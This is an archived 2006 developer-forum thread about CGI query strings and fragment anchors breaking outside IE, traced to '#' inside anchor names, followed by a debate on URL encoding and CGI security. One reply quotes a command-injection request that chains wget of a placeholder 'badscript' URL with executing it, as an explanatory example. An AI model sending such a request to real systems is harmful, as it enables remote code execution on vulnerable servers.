468,101 Members | 1,531 Online
Bytes | Developer Community
New Post

Home Posts Topics Members FAQ

Post your question to a community of 468,101 developers. It's quick & easy.

specifying anchors and cgi parameters in a single URI

Hi,

need some advice on URIs

In a dynamic page (perl driven) we list a number of items presented in
an hierarchical tree structure. Within that page is a form which allows
you to search for items containing various strings (trying to get the
users to *remember* CTRL+F was proving fruitless). The results are then
presented at the top of the page with links to the relative anchor
references (<a href="#foo">) . When clicked these would take you to
that item in the hierarchical tree.

The problem is that the URI of the page itself contains CGI parameters
( e.g. http://www.foo.com/script.cgi?p=1&r=2 ) and these are carried
over to the URIs containing the anchors ( e.g.
http://www.foo.com/script.cgi?p=1&r=2#foo ).

These URIs containing parameters and anchors work in IE (6 and below)
but not in Moziall,Firefox, Konqueror or Opera. Any ideas on what I can
do to enable the same functionality cross-browser?

regards
Crimperman

Feb 24 '06 #1
17 4086
Crimperman wrote:
Hi,

need some advice on URIs

In a dynamic page (perl driven) we list a number of items presented in
an hierarchical tree structure. Within that page is a form which allows
you to search for items containing various strings (trying to get the
users to *remember* CTRL+F was proving fruitless). The results are then
presented at the top of the page with links to the relative anchor
references (<a href="#foo">) . When clicked these would take you to
that item in the hierarchical tree.

The problem is that the URI of the page itself contains CGI parameters
( e.g. http://www.foo.com/script.cgi?p=1&r=2 ) and these are carried
over to the URIs containing the anchors ( e.g.
http://www.foo.com/script.cgi?p=1&r=2#foo ).

These URIs containing parameters and anchors work in IE (6 and below)
but not in Moziall,Firefox, Konqueror or Opera. Any ideas on what I can
do to enable the same functionality cross-browser?

regards
Crimperman

A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.

If you don't know about this already,
you _may_ also have written your script in a way that
crackers can get into easily.

Google for "Perl detainting" and "Perl CGI security" and such.
Be sure to use cgi.pm instead of your own cgi interface -- it
has many security checks built in that you may not have thought
about.
--
mbstevens
http://www.mbstevens.com/

Feb 24 '06 #2
mbstevens wrote:
A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.
This creates two problems. An href of "%23foo" (and *only* that) is not
passed by the browser as a local anchor - it is instead passed as
http://www.foo.com/#foo .
Giving the entire URI in the link to the anchor (
http://www.foo.com/script.cgi?p=1&r=2%23foo ) ends up with the browser
passing 2%23foo as the value for the last parameter.
Encoding the # using # just gives the same result as using a plain
# character.
If you don't know about this already,
you _may_ also have written your script in a way that
crackers can get into easily.


I did know about it (the other relevant characters are encoded) but -
in this case - the script is not on a public facing site and I don't
use this kind of script on any of the public facing ones. Thanks tho'.

Crimperman

Feb 24 '06 #3
Crimperman wrote:
The problem is that the URI of the page itself contains CGI parameters
( e.g. http://www.foo.com/script.cgi?p=1&r=2 ) and these are carried
over to the URIs containing the anchors ( e.g.
http://www.foo.com/script.cgi?p=1&r=2#foo ).

These URIs containing parameters and anchors work in IE (6 and below)
but not in Moziall,Firefox, Konqueror or Opera. Any ideas on what I can
do to enable the same functionality cross-browser?


They should just work everywhere. What does your link target look like? <a
name="#foo">...</a> is a common mistake (there shouldn't be a # character
in the name).

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 24 '06 #4
mbstevens wrote:
A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.


That is because the # character has special meaning in URLs, so if you want
to pass that character to the server you have to encode it. In this case
the OP *wants* the special meaning, so URL Encoding it would not be the way
to go.

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 24 '06 #5
Solved.

It turned out the targets were all coded incorrectly. They were all of
the form <a name="#foo"></a> . That is including the hash mark in the
name of the target!

Many thanks for the suggestions though.

Crimperman

Feb 24 '06 #6
David Dorward wrote:
mbstevens wrote:

A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.

That is because the # character has special meaning in URLs, so if you want
to pass that character to the server you have to encode it. In this case
the OP *wants* the special meaning, so URL Encoding it would not be the way
to go.


You're usually spot on, so I may be misunderstanding your intention
here, but:

the CGI.pm module handles encoding and decoding transparently.
My reference claims that all data attached to the URI and sent
by the GET method should be encoded.

I'm thinking that perhaps some of his browsers are taking
care of the encoding for him, and some aren't.

At any rate, if the OP is not using CGI.pm, a simple
regex over the would fix him up, no?
--
mbstevens
http://www.mbstevens.com/

Feb 24 '06 #7
mbstevens wrote:
That is because the # character has special meaning in URLs
the CGI.pm module handles encoding and decoding transparently.


The = character also has special meaning, so I'll use it in this example:

http://www.example.com/foo?this=that%3Dsomething

When the query string gets parsed the "=" character will be treated as a
special character while the "%3D" will be decoded to an "=" - but this
latter one is not a special character (it was URL encoded) so it is treated
as data.

Thus:

#!/usr/bin/perl
use CGI;
my $q = CGI->new();
print $q->header;
print $q->param('this');

Will output:

that=something

It is for similar reasons that if you URL encode the "#" character (in the
example with the query string) then it will get treated as just another bit
of data on the query string, and not as the special character the delimits
the URL from the fragment identifier.

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 24 '06 #8
mbstevens wrote:

A number of URI characters must be encoded, one of which is "#".
Use "%23" for it. Google "URI encoding" for more detail.

If you don't know about this already,
you _may_ also have written your script in a way that
crackers can get into easily.

Google for "Perl detainting" and "Perl CGI security" and such.


Google returns nothing for "perl detainting", and Perl CGI security is
too broad considering you haven't given any details as to the nature of
the breach. Can you give us something more specific?
Feb 24 '06 #9
David Dorward wrote:
Crimperman wrote:

The problem is that the URI of the page itself contains CGI parameters
( e.g. http://www.foo.com/script.cgi?p=1&r=2 ) and these are carried
over to the URIs containing the anchors ( e.g.
http://www.foo.com/script.cgi?p=1&r=2#foo ).

These URIs containing parameters and anchors work in IE (6 and below)
but not in Moziall,Firefox, Konqueror or Opera. Any ideas on what I can
do to enable the same functionality cross-browser?

They should just work everywhere. What does your link target look like? <a
name="#foo">...</a> is a common mistake (there shouldn't be a # character
in the name).


AND it works in IE, so that would be consistent with the OP's observation.
Feb 24 '06 #10
Crimperman wrote:
Hi,

need some advice on URIs

In a dynamic page (perl driven) we list a number of items presented in
an hierarchical tree structure. Within that page is a form which allows
you to search for items containing various strings (trying to get the
users to *remember* CTRL+F was proving fruitless). The results are then
presented at the top of the page with links to the relative anchor
references (<a href="#foo">) . When clicked these would take you to
that item in the hierarchical tree.

The problem is that the URI of the page itself contains CGI parameters
( e.g. http://www.foo.com/script.cgi?p=1&r=2 ) and these are carried
over to the URIs containing the anchors ( e.g.
http://www.foo.com/script.cgi?p=1&r=2#foo ).


In addition to what others have written, the ampersands in your
parameter strings should be entered as &amp;, though practically
speaking that rarely matters.
Feb 24 '06 #11
On Fri, 24 Feb 2006, Harlan Messinger wrote:
Google returns nothing for "perl detainting", and Perl CGI security
is too broad considering you haven't given any details as to the
nature of the breach. Can you give us something more specific?


CGI security is a broad topic, and hardly appropriate for going into
detail on an HTML-specific group.

The general principle is always to treat values supplied from outside
as suspicious, and subject them to appropriate filtering before
allowing them to do anything significant.

In Perl there is a -T option, which will raise an alert if unfiltered
outside data (so-called "tainted data") is allowed to get close to a
system function. The data has to be untainted before being used in
such a context.

One needs in general to take a similar line with user-supplied data to
a CGI script. But the -T option won't, in general, save you here.
Any number of scripts have allowed themselves to be fooled into
behaving as an open spam relay, or permitting spammers to advertise
their products on bulletin boards, weblogs and whatnot. Yours could
well be next.

For more details I'd recommend finding a more appropriate group -
preferably *after* having read Stein's web security FAQ and related
documentation.

--

Most folks would think a Referer header is something you smoke.
-- Bruce Tomlin in a.s.r
Feb 24 '06 #12
David Dorward wrote:
mbstevens wrote:

That is because the # character has special meaning in URLs


the CGI.pm module handles encoding and decoding transparently.

The = character also has special meaning, so I'll use it in this example:

http://www.example.com/foo?this=that%3Dsomething

When the query string gets parsed the "=" character will be treated as a
special character while the "%3D" will be decoded to an "=" - but this
latter one is not a special character (it was URL encoded) so it is treated
as data.

Thus:

#!/usr/bin/perl
use CGI;
my $q = CGI->new();
print $q->header;
print $q->param('this');

Will output:

that=something

It is for similar reasons that if you URL encode the "#" character (in the
example with the query string) then it will get treated as just another bit
of data on the query string, and not as the special character the delimits
the URL from the fragment identifier.

Ok, I can see that, but according to RFC 1738
"Thae character '#' is unsafe and should always be encoded
because it is used in World Wide Web and in other
systems to delimit a URL from a fragment/anchor
identifier that might follow it."
http://www.faqs.org/rfcs/rfc1738.html

....which is basically as you have said, but it is the
security aspect that worries me.

Perhaps the script should
be passed a key=value pair whose key indicates that an
anchor or fragment is going to be used. Then it would be
easy enough to make the script smart enough to handle
the encoded character correctly. It would also be easy
enough to just let the caller skip the '#' character altogether,
whether encoded or not.


Feb 24 '06 #13
mbstevens wrote:
Ok, I can see that, but according to RFC 1738
"Thae character '#' is unsafe and should always be encoded
because it is used in World Wide Web and in other
systems to delimit a URL from a fragment/anchor
identifier that might follow it."
http://www.faqs.org/rfcs/rfc1738.html
Which is why it can't be encoded - the OP _wants_ to delimit the URL from
the fragment identifer.
...which is basically as you have said, but it is the
security aspect that worries me.
What security aspect?
Perhaps the script should be passed a key=value pair whose key indicates
that an anchor or fragment is going to be used


The script doesn't care though, only the user agent does. The browser strips
off the # and everything after it before requesting the URL from the
server. Then it looks for the fragment in the document that is returns and
scrolls to it.

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 24 '06 #14
David Dorward wrote:
...which is basically as you have said, but it is the
security aspect that worries me.

What security aspect?

Crackers play naughty games with meta characters.
'>', ';', '|', and '..' are well known as
sources of CGI abuse. So, the receiving Perl program
has to be smart enough to deal with them when they come.

I don't have an example of CGI abuse using "#", and the people who wrote
the RFC could be wrong, but I tend to trust them about things like this.
Berners-Lee Manister and McCahill are the editors.

"All unsafe characters must always be encoded within a URL. For
example, the character "#" must be encoded within URLs even in
systems that do not normally deal with fragment or anchor
identifiers, so that if the URL is copied into another system that
does use them, it will not be necessary to change the URL encoding."

....from the previous source.

You might get away with passing the characters in to the Perl program
any way you want, I suppose, but the Perl program had better be smart
enough to interpret them correctly and in a way that won't lead to abuse
of the CGI program.


Feb 24 '06 #15
mbstevens <NO***********@xmbstevensx.com> writes:
David Dorward wrote:
...which is basically as you have said, but it is the
security aspect that worries me. What security aspect?

Crackers play naughty games with meta characters.
'>', ';', '|', and '..' are well known as
sources of CGI abuse. So, the receiving Perl program
has to be smart enough to deal with them when they come.


True, but largely irrelevant to the URL encoding issue. '..', for
example, consists entirely of non-reserved characters that would never
be encoded, and the ';' exploits *rely* on it being encoded as the RFC
suggests so that the CGI script doesn't interpret it as a separator [1].

GET /cgi-bin/insecure.cgi?cmd=cd+/tmp;wget+URLOFbadscript;./badscript
is an entirely harmless request.

GET /cgi-bin/insecure.cgi?cmd=cd+/tmp%3Bwget+URLOFbadscript%3B./badscript
is a very dangerous request.

[1] This does depend on the language. CGI libraries are _recommended_
to treat ';' as a separator equivalent to '&', but not all of them do.
I don't have an example of CGI abuse using "#", and the people who
wrote the RFC could be wrong, but I tend to trust them about things
like this. Berners-Lee Manister and McCahill are the editors.

"All unsafe characters must always be encoded within a URL. For
example, the character "#" must be encoded within URLs even in
systems that do not normally deal with fragment or anchor
identifiers, so that if the URL is copied into another system that
does use them, it will not be necessary to change the URL encoding."

...from the previous source.
I think what this is talking about is not what you think it is talking
about:

You have the URL http://localhost/cgi-bin/script.pl?search=%23define

The current system (System A) this URL is being held in does not use
fragment identifiers, so it *could* translate this URL internally to
http://localhost/cgi-bin/script.pl?search=#define with no ill effects
to itself.

The quotation you mention says that it shouldn't do this, however, in
case it needs to pass the URL to a second system (System B) that does
use fragment identifiers. If it has kept the # encoded as %23, then
System B will recognise it as part of the query string part of the
URL. If it does not keep it encoded, then System B will incorrectly
assume that it is the separator between the query string "search=" and
the fragment identifier "define".

You *could* make up a case where this was a security problem when the
unsafe character is '#', but in practice it's more likely to just be a
data integrity problem.

Anyway, this doesn't apply when # (or ? or =, which are also reserved
characters) is used _for_its_reserved_meaning_ in a URL as opposed to
being entered as an encoded literal character.
You might get away with passing the characters in to the Perl program
any way you want, I suppose, but the Perl program had better be smart
enough to interpret them correctly and in a way that won't lead to
abuse of the CGI program.


Well, in the event that the CGI program does do something silly upon
receiving an unencoded # in the QUERY_STRING part of the GET request,
it doesn't matter how *you* pass the character in, since someone else
can always send it differently.

--
Chris
Feb 24 '06 #16
mbstevens wrote:
What security aspect?
Crackers play naughty games with meta characters.
'>', ';', '|', and '..' are well known as
sources of CGI abuse. So, the receiving Perl program
has to be smart enough to deal with them when they come.
Yes - but those have special meaning when it comes to filesystems and/or SQL
and/or shell. Not URLs.
I don't have an example of CGI abuse using "#", and the people who wrote
the RFC could be wrong, but I tend to trust them about things like this.
Since the browser will strip the # and everything following it, that isn't
an issue. It will never get to the server side script.
Berners-Lee Manister and McCahill are the editors.

"All unsafe characters must always be encoded within a URL. For
example, the character "#" must be encoded within URLs even in
systems that do not normally deal with fragment or anchor
identifiers, so that if the URL is copied into another system that
does use them, it will not be necessary to change the URL encoding."


In other words: If you are using a URL on a system where "#" does not
indicate a separator between URL and fragment identifier, then encode it
anyway since another system might treat it as such a separator and thus
break.

I believe the term "unsafe" refers to the chance of it breaking, not
security implications.

--
David Dorward <http://blog.dorward.me.uk/> <http://dorward.me.uk/>
Home is where the ~/.bashrc is
Feb 25 '06 #17
David Dorward wrote:
In other words: If you are using a URL on a system where "#" does not
indicate a separator between URL and fragment identifier, then encode it
anyway since another system might treat it as such a separator and thus
break.

I believe the term "unsafe" refers to the chance of it breaking, not
security implications.

OK! Thanks for clearing that up.


Feb 25 '06 #18

This discussion thread is closed

Replies have been disabled for this discussion.

Similar topics

1 post views Thread by Mark Kuiphuis | last post: by
7 posts views Thread by Ben Wilson | last post: by
10 posts views Thread by Amittai Aviram | last post: by
2 posts views Thread by mlv2312 | last post: by
1 post views Thread by mlv2312 | last post: by
2 posts views Thread by learner | last post: by
21 posts views Thread by adrian suri | last post: by
3 posts views Thread by JohnZing | last post: by
1 post views Thread by Solo | last post: by
By using this site, you agree to our Privacy Policy and Terms of Use.